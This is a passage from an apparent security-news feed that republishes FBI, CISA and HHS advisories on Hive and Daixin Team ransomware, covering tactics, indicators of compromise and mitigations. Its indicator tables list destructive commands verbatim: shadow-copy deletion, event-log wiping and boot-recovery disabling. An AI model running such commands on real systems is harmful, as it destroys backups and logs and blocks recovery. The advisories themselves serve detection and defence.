<li>Stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or via PowerShell [<a href="https://attack.mitre.org/versions/v12/techniques/T1059/">T1059</a>] [<a href="https://attack.mitre.org/versions/v12/techniques/T1490/">T1490</a>].</li>
<li>Delete Windows event logs, specifically the System, Security and Application logs [<a href="https://attack.mitre.org/versions/v12/techniques/T1070/">T1070</a>].</li>
</ul><p>Prior to encryption, Hive ransomware removes virus definitions and disables all portions of Windows Defender and other common antivirus programs in the system registry [<a href="https://attack.mitre.org/versions/v12/techniques/T1112/">T1112</a>].</p>
<p>Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz [<a href="https://attack.mitre.org/versions/v12/techniques/T1537/">T1537</a>]. In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.</p>
<p>During the encryption process, a file named *.key (previously *.key.*) is created in the root directory (C:\ or /root/). Required for decryption, this key file only exists on the machine where it was created and cannot be reproduced. The ransom note, HOW_TO_DECRYPT.txt is dropped into each affected directory and states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered [<a href="https://attack.mitre.org/versions/v12/techniques/T1486/">T1486</a>]. The ransom note contains a “sales department” .onion link accessible through a TOR browser, enabling victim organizations to contact the actors through a live chat panel to discuss payment for their files. However, some victims reported receiving phone calls or emails from Hive actors directly to discuss payment.</p>
<p>The ransom note also threatens victims that a public disclosure or leak site accessible on the TOR site, “HiveLeaks”, contains data exfiltrated from victim organizations who do not pay the ransom demand (see figure 1 below). Additionally, Hive actors have used anonymous file sharing sites to disclose exfiltrated data (see table 1 below).</p>
<p>


<figure class="c-figure u-align-center" role="group"><div class="c-figure__media"><img alt="" data-entity-type="file" data-entity-uuid="d1b2986e-6ab4-424f-bb36-72b8d9e06b65" src="https://www.cisa.gov/sites/default/files/publications/How%20to%20Decrypt.png"></div>
      <figcaption class="c-figure__caption"><em>Figure 1: Sample Hive Ransom Note</em></figcaption></figure></p><p> </p>
<table><caption><em>Table 1: Anonymous File Sharing Sites Used to Disclose Data</em></caption>
<tbody><tr><td>
<p><a>https://anonfiles[.]com</a></p>
</td>
</tr><tr><td>
<p>https://mega[.]nz</p>
</td>
</tr><tr><td>
<p>https://send.exploit[.]in</p>
</td>
</tr><tr><td>
<p>https://ufile[.]io</p>
</td>
</tr><tr><td>
<p>https://www.sendspace[.]com</p>
</td>
</tr><tr><td>
<p>https://privatlab[.]net</p>
</td>
</tr><tr><td>
<p>https://privatlab[.]com</p>
</td>
</tr></tbody></table><p> </p>
<p>Once the victim organization contacts Hive actors on the live chat panel, Hive actors communicate the ransom amount and the payment deadline. Hive actors negotiate ransom demands in U.S. dollars, with initial amounts ranging from several thousand to millions of dollars. Hive actors demand payment in Bitcoin.</p>
<p>Hive actors have been known to reinfect—with either Hive ransomware or another ransomware variant—the networks of victim organizations who have restored their network without making a ransom payment.</p>
<h4><strong>Indicators of Compromise</strong></h4>
<p>Threat actors have leveraged the following IOCs during Hive ransomware compromises. Note: Some of these indicators are legitimate applications that Hive threat actors used to aid in further malicious exploitation. FBI, CISA, and HHS recommend removing any application not deemed necessary for day-to-day operations. See tables 2–3 below for IOCs obtained from FBI threat response investigations as recently as November 2022.</p>
<table class="Table"><caption><em>Table 2: Known IOCs as of November 2022</em></caption>
<tbody><tr><td>
<p>Known IOCs - Files</p>
</td>
</tr><tr><td>
<p>HOW_TO_DECRYPT.txt typically in directories with encrypted files</p>
</td>
</tr><tr><td>
<p>*.key typically in the root directory, i.e., C:\ or /root</p>
</td>
</tr><tr><td>
<p>hive.bat</p>
</td>
</tr><tr><td>
<p>shadow.bat </p>
</td>
</tr><tr><td>
<p>asq.r77vh0[.]pw - Server hosted malicious HTA file</p>
</td>
</tr><tr><td>
<p>asq.d6shiiwz[.]pw - Server referenced in malicious regsvr32 execution</p>
</td>
</tr><tr><td>
<p>asq.swhw71un[.]pw - Server hosted malicious HTA file</p>
</td>
</tr><tr><td>
<p>asd.s7610rir[.]pw - Server hosted malicious HTA file</p>
</td>
</tr><tr><td>
<p>Windows_x64_encrypt.dll </p>
</td>
</tr><tr><td>
<p>Windows_x64_encrypt.exe </p>
</td>
</tr><tr><td>
<p>Windows_x32_encrypt.dll</p>
</td>
</tr><tr><td>
<p>Windows_x32_encrypt.exe</p>
</td>
</tr><tr><td>
<p>Linux_encrypt</p>
</td>
</tr><tr><td>
<p>Esxi_encrypt</p>
</td>
</tr><tr><td>
<p>Known IOCs – Events </p>
</td>
</tr><tr><td>
<p>System, Security and Application Windows event logs wiped</p>
</td>
</tr><tr><td>
<p>Microsoft Windows Defender AntiSpyware Protection disabled </p>
</td>
</tr><tr><td>
<p>Microsoft Windows Defender AntiVirus Protection disabled </p>
</td>
</tr><tr><td>
<p>Volume shadow copies deleted</p>
</td>
</tr><tr><td>
<p>Normal boot process prevented</p>
</td>
</tr><tr><td>
<p>Known IOCs – Logged Processes</p>
</td>
</tr><tr><td>
<p>wevtutil.exe cl system</p>
</td>
</tr><tr><td>
<p>wevtutil.exe cl security</p>
</td>
</tr><tr><td>
<p>wevtutil.exe cl application</p>
</td>
</tr><tr><td>
<p>vssadmin.exe delete shadows /all /quiet</p>
</td>
</tr><tr><td>
<p>wmic.exe SHADOWCOPY /nointeractive</p>
</td>
</tr><tr><td>
<p>wmic.exe shadowcopy delete</p>
</td>
</tr><tr><td>
<p>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures</p>
</td>
</tr><tr><td>
<p>bcdedit.exe /set {default} recoveryenabled no</p>
</td>
</tr></tbody></table><p> </p>
<table class="Table"><caption><em>Table 3: Potential IOC IP Addresses as of November 2022</em></caption>
<caption>Note: Some of these observed IP addresses are more than a year old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action like blocking.</caption>
<tbody><tr><td>
<p><a>Potential IOC IP Addresses for Compromise or Exfil:</a></p>
</td>
</tr><tr><td>
<p>84.32.188[.]57</p>
</td>
<td>
<p>84.32.188[.]238</p>
</td>
</tr><tr><td>
<p>93.115.26[.]251</p>
</td>
<td>
<p>185.8.105[.]67</p>
</td>
</tr><tr><td>
<p>181.231.81[.]239</p>
</td>
<td>
<p>185.8.105[.]112</p>
</td>
</tr><tr><td>
<p>186.111.136[.]37</p>
</td>
<td>
<p>192.53.123[.]202</p>
</td>
</tr><tr><td>
<p>158.69.36[.]149</p>
</td>
<td>
<p>46.166.161[.]123</p>
</td>
</tr><tr><td>
<p>108.62.118[.]190</p>
</td>
<td>
<p>46.166.161[.]93</p>
</td>
</tr><tr><td>
<p>185.247.71[.]106</p>
</td>
<td>
<p>46.166.162[.]125</p>
</td>
</tr><tr><td>
<p>5.61.37[.]207</p>
</td>
<td>
<p>46.166.162[.]96</p>
</td>
</tr><tr><td>
<p>185.8.105[.]103</p>
</td>
<td>
<p>46.166.169[.]34</p>
</td>
</tr><tr><td>
<p>5.199.162[.]220</p>
</td>
<td>
<p>93.115.25[.]139</p>
</td>
</tr><tr><td>
<p>5.199.162[.]229</p>
</td>
<td>
<p>93.115.27[.]148</p>
</td>
</tr><tr><td>
<p>89.147.109[.]208</p>
</td>
<td>
<p>83.97.20[.]81</p>
</td>
</tr><tr><td>
<p>5.61.37[.]207</p>
</td>
<td>
<p>5.199.162[.]220</p>
</td>
</tr><tr><td>
<p>5.199.162[.]229;</p>
</td>
<td>
<p>46.166.161[.]93</p>
</td>
</tr><tr><td>
<p>46.166.161[.]123;</p>
</td>
<td>
<p>46.166.162[.]96</p>
</td>
</tr><tr><td>
<p>46.166.162[.]125</p>
</td>
<td>
<p>46.166.169[.]34</p>
</td>
</tr><tr><td>
<p>83.97.20[.]81</p>
</td>
<td>
<p>84.32.188[.]238</p>
</td>
</tr><tr><td>
<p>84.32.188[.]57</p>
</td>
<td>
<p>89.147.109[.]208</p>
</td>
</tr><tr><td>
<p>93.115.25[.]139;</p>
</td>
<td>
<p>93.115.26[.]251</p>
</td>
</tr><tr><td>
<p>93.115.27[.]148</p>
</td>
<td>
<p>108.62.118[.]190</p>
</td>
</tr><tr><td>
<p>158.69.36[.]149/span&gt;</p>
</td>
<td>
<p>181.231.81[.]239</p>
</td>
</tr><tr><td>
<p>185.8.105[.]67</p>
</td>
<td>
<p>185.8.105[.]103</p>
</td>
</tr><tr><td>
<p>185.8.105[.]112</p>
</td>
<td>
<p>185.247.71[.]106</p>
</td>
</tr><tr><td>
<p>186.111.136[.]37</p>
</td>
<td>
<p>192.53.123[.]202</p>
</td>
</tr></tbody></table><p> </p>
<h4><strong>MITRE ATT&amp;CK TECHNIQUES</strong></h4>
<p>See table 4 for all referenced threat actor tactics and techniques listed in this advisory.</p>
<table><caption>Table 4: Hive Actors ATT&amp;CK Techniques for Enterprise</caption>
<tbody><tr><td>
<p><u>Initial Access</u></p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>External Remote Services</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1133/">T1133</a></p>
</td>
<td>
<p>Hive actors gain access to victim networks by using single factor logins via RDP, VPN, and other remote network connection protocols.</p>
</td>
</tr><tr><td>
<p>Exploit Public-Facing Application</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1190/">T1190</a></p>
</td>
<td>
<p>Hive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321.</p>
</td>
</tr><tr><td>
<p>Phishing</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1566/001/">T1566.001</a></p>
</td>
<td>
<p>Hive actors gain access to victim networks by distributing phishing emails with malicious attachments.</p>
</td>
</tr><tr><td>
<p><u>Execution</u></p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Command and Scripting Interpreter</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1059/">T1059</a></p>
</td>
<td>
<p>Hive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or PowerShell.</p>
</td>
</tr><tr><td>
<p><u>Defense Evasion</u></p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Indicator Removal on Host</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1070/">T1070</a></p>
</td>
<td>
<p>Hive actors delete Windows event logs, specifically, the System, Security and Application logs.</p>
</td>
</tr><tr><td>
<p>Modify Registry</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1112/">T1112</a></p>
</td>
<td>
<p>Hive actors set registry values for DisableAntiSpyware and DisableAntiVirus to 1.</p>
</td>
</tr><tr><td>
<p>Impair Defenses</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1562/001/">T1562</a></p>
</td>
<td>
<p>Hive actors seek processes related to backups, antivirus/anti-spyware, and file copying and terminates those processes to facilitate file encryption.</p>
</td>
</tr><tr><td>
<p><u>Exfiltration</u></p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Transfer Data to Cloud Account</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1537/">T1537</a></p>
</td>
<td>
<p>Hive actors exfiltrate data from victims, using a possible combination of Rclone and the cloud storage service Mega.nz.</p>
</td>
</tr><tr><td>
<p><u>Impact</u></p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p> </p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Data Encrypted for Impact</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1486/">T1486</a></p>
</td>
<td>
<p>Hive actors deploy a ransom note HOW_TO_DECRYPT.txt into each affected directory which states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered.</p>
</td>
</tr><tr><td>
<p>Inhibit System Recovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v12/techniques/T1490/">T1490</a></p>
</td>
<td>
<p>Hive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin via command line or PowerShell.</p>
</td>
</tr></tbody></table><div>
<h3>Mitigations</h3>
</div>
<p>FBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:</p>
<ul><li>Verify Hive actors no longer have access to the network.</li>
<li>Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>. Consider leveraging a centralized patch management system to automate and expedite the process.</li>
<li>Require <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf">phishing-resistant MFA</a> for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.</li>
<li>If used, secure and monitor RDP.
<ul><li>Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure.</li>
<li>After assessing risks, if you deem RDP operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse.</li>
<li>If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.</li>
<li>Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.</li>
<li>Be sure to properly configure devices and enable security features.</li>
<li>Disable ports and protocols not used for business purposes, such as RDP Port 3389/TCP.</li>
</ul></li>
<li>Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.</li>
<li>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Ensure your backup data is not already infected.,</li>
<li>Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords/settings if applicable.</li>
<li>Install and regularly update anti-virus or anti-malware software on all hosts.</li>
<li>Enable PowerShell Logging including module logging, script block logging and transcription.</li>
<li>Install an enhanced monitoring tool such as Sysmon from Microsoft for increased logging.</li>
<li>Review the following additional resources.
<ul><li>The joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a> provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.</li>
<li>The Cybersecurity and Infrastructure Security Agency-Multi-State Information Sharing &amp; Analysis Center <a href="https://www.cisa.gov/stopransomware/ransomware-guide">Joint Ransomware Guide</a> covers additional best practices and ways to prevent, protect, and respond to a ransomware attack.</li>
<li><a href="https://www.cisa.gov/stopransomware">StopRansomware.gov</a> is the U.S. Government’s official one-stop location for resources to tackle ransomware more effectively.</li>
</ul></li>
</ul><p>If your organization is impacted by a ransomware incident, FBI, CISA, and HHS recommend the following actions.</p>
<ul><li><strong>Isolate the infected system</strong>. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected.</li>
<li><strong>Turn off other computers and devices</strong>. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.</li>
<li><strong>Secure your backups</strong>. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.</li>
</ul><p>In addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.</p>
<h4><strong>Preparing for Cyber Incidents</strong></h4>
<ul><li><strong>Review the security posture of third-party vendors and those interconnected with your organization</strong>. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.</li>
<li><strong>Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs</strong> under an established security policy.</li>
<li><strong>Document and monitor external remote connections</strong>. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.</li>
<li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).</li>
</ul><h4><strong>Identity and Access Management</strong></h4>
<ul><li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with <a href="https://pages.nist.gov/800-63-3/">National Institute of Standards and Technology (NIST) standards</a> for developing and managing password policies.
<ul><li>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.</li>
<li>Store passwords in hashed format using industry-recognized password managers.</li>
<li>Add password user “salts” to shared login credentials.</li>
<li>Avoid reusing passwords.</li>
<li>Implement multiple failed login attempt account lockouts.</li>
<li>Disable password “hints.”</li>
<li>Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.<br>
		Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
<li>Require administrator credentials to install software.</li>
</ul></li>
<li><strong>Require phishing-resistant multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts.</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege.</li>
<li><strong>Implement time-based access for accounts set at the admin level and higher</strong>. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. </li>
</ul><h4><strong>Protective Controls and Architecture</strong></h4>
<ul><li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool</strong>. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</li>
<li>Install, regularly update, and enable real time detection for antivirus software on all hosts.</li>
</ul><p>Vulnerability and Configuration Management</p>
<ul><li><strong>Consider adding an email banner to emails</strong> received from outside your organization.</li>
<li><strong>Disable command-line and scripting activities and permissions</strong>. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.</li>
<li><strong>Ensure devices are properly configured and that security features are enabled</strong>. </li>
<li><strong>Restrict Server Message Block (SMB) Protocol within the network to only access necessary servers and remove or disable outdated versions of SMB</strong> (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.</li>
</ul><h4><strong>REFERENCES</strong></h4>
<ul><li><a href="http://www.stopransomware.gov/">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf">CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide</a>.</li>
<li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/">Ransomware Readiness Assessment</a>.</li>
</ul><h4><strong>INFORMATION REQUESTED</strong></h4>
<p>The FBI, CISA, and HHS do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your <a href="https://www.fbi.gov/contact-us/field-offices">local FBI field office</a>, or to CISA at <a href="mailto:report@cisa.gov">report@cisa.gov</a> or (888) 282-0870. Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under US law, and prevent future attacks. </p>
<p>The FBI may seek the following information that you determine you can legally share, including:</p>
<ul><li>Recovered executable files</li>
<li>Live random access memory (RAM) capture</li>
<li>Images of infected systems</li>
<li>Malware samples</li>
<li>IP addresses identified as malicious or suspicious</li>
<li>Email addresses of the attackers</li>
<li>A copy of the ransom note</li>
<li>Ransom amount</li>
<li>Bitcoin wallets used by the attackers</li>
<li>Bitcoin wallets used to pay the ransom</li>
<li>Post-incident forensic reports</li>
</ul><h4>DISCLAIMER</h4>
<p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.</p>
<p> </p>
<div>
<h3>Revisions</h3>
</div>
<p>Initial Version: November 17, 2022</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: Daixin Team]]></title>
<description><![CDATA[Summary

Actions to take today to mitigate cyber threats from ransomware:
• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.
Note:...]]></description>
<link>https://tsecurity.de/de/1812983/sicherheitsluecken/stopransomware-daixin-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1812983/sicherheitsluecken/stopransomware-daixin-team/</guid>
<pubDate>Tue, 07 Mar 2023 06:28:58 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<h3>Summary</h3>
</div>
<p>Actions to take today to mitigate cyber threats from ransomware:</p>
<p>• Install updates for operating systems, software, and firmware as soon as they are released.<br>
• Require phishing-resistant MFA for as many services as possible.<br>
• Train users to recognize and report phishing attempts.</p>
<p><em><strong>Note: </strong>This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These <a href="https://cisa.gov/stopransomware/stopransomware">#StopRansomware</a> advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://cisa.gov/stopransomware">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.</p>
<p>This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.</p>
<p>Download the PDF version of this report: <a href="https://www.cisa.gov/sites/default/files/publications/aa22-294a-stopransomware-daixin-team.pdf">pdf, 591 KB</a></p>
<p>Download the IOCs: <a href="https://www.cisa.gov/sites/default/files/publications/AA22-294A.stix.xml">.stix 23.2 kb</a></p>
<div>
<h3>Technical Details</h3>
</div>
<p><em>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 11. See <a href="https://attack.mitre.org/versions/v11/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a> for all referenced tactics and techniques.</em></p>
<p>Cybercrime actors routinely target HPH Sector organizations with ransomware:</p>
<ul><li>As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.</li>
<li>According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.</li>
</ul><p>The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:</p>
<ul><li>Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or</li>
<li>Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.</li>
</ul><p>Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [<a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a>]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [<a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a>] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [<a href="https://attack.mitre.org/versions/v11/techniques/T1598/002/">T1598.002</a>].</p>
<p>After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [<a href="https://attack.mitre.org/versions/v11/techniques/T1563/001">T1563.001</a>] and Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v11/techniques/T1563/002">T1563.002</a>]. Daixin actors have sought to gain privileged account access through credential dumping [<a href="https://attack.mitre.org/versions/v11/techniques/T1003/">T1003</a>] and pass the hash [<a href="https://attack.mitre.org/versions/v11/techniques/T1550/002/">T1550.002</a>]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [<a href="https://attack.mitre.org/versions/v11/techniques/T1098/">T1098</a>] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [<a href="https://attack.mitre.org/versions/v11/techniques/T1486/">T1486</a>] on those servers. </p>
<p>According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in <code>/vmfs/volumes/</code> with the following extensions: <code>.vmdk</code>, <code>.vmem</code>, <code>.vswp</code>, <code>.vmsd</code>, <code>.vmx</code>, and <code>.vmsn</code>. A ransom note is also written to <code>/vmfs/volumes/</code>. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. <code>Figure 3</code> and <code>Figure 4</code> include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”</p>
<p><img alt="" data-entity-type="file" data-entity-uuid="f27be1b8-7608-4dfa-a7c8-a72836daf05d" src="https://www.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture1.png" class="align-center"></p><p><em>Figure 1: Daixin Team – Ransomware Targeted File Path</em></p>
<p><img alt="" data-entity-type="file" data-entity-uuid="ca7614dd-34b9-4bcc-aae1-4255d33ac377" src="https://www.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture2.png" class="align-center"></p><p><em>Figure 2: Daixin Team – Ransomware Targeted File Extensions</em></p>
<p><img alt="" data-entity-type="file" data-entity-uuid="5c494cd6-263f-4a7b-bcb0-a9f2bbb9ef86" src="https://www.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture3.png" class="align-center"></p><p><em>Figure 3: Example 1 of Daixin Team Ransomware Note</em></p>
<p><img alt="" data-entity-type="file" data-entity-uuid="b99fae08-b9a0-431b-9ef9-68e6a96a11b7" src="https://www.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture4.png" class="align-center"></p><p><em>Figure 4: Example 2 of Daixin Team Ransomware Note</em></p>
<p>In addition to deploying ransomware, Daixin actors have exfiltrated data [<a href="https://attack.mitre.org/versions/v11/tactics/TA0010/">TA0010</a>] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used <a href="https://attack.mitre.org/versions/v11/software/S0508/">Ngrok</a>—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [<a href="https://attack.mitre.org/versions/v11/techniques/T1567/">T1567</a>].</p>
<h3>MITRE ATT&amp;CK TACTICS AND TECHNIQUES</h3>
<p>See Table 1 for all referenced threat actor tactics and techniques included in this advisory.</p>
<p><em>Table 1: Daixin Actors’ ATT&amp;CK Techniques for Enterprise</em></p>
<table class="Table"><tbody><tr><td>
<p>Reconnaissance</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Phishing for Information: Spearphishing Attachment</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1598/002/">T1598.002</a></p>
</td>
<td>
<p>Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.</p>
</td>
</tr><tr><td>
<p>Initial Access</p>
</td>
</tr><tr><td>
<p>Technique Title</p>
</td>
<td>
<p>ID</p>
</td>
<td>
<p>Use</p>
</td>
</tr><tr><td>
<p>Exploit Public-Facing Application</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a></p>
</td>
<td>
<p>Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.</p>
</td>
</tr><tr><td>
<p>Valid Accounts</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a></p>
</td>
<td>
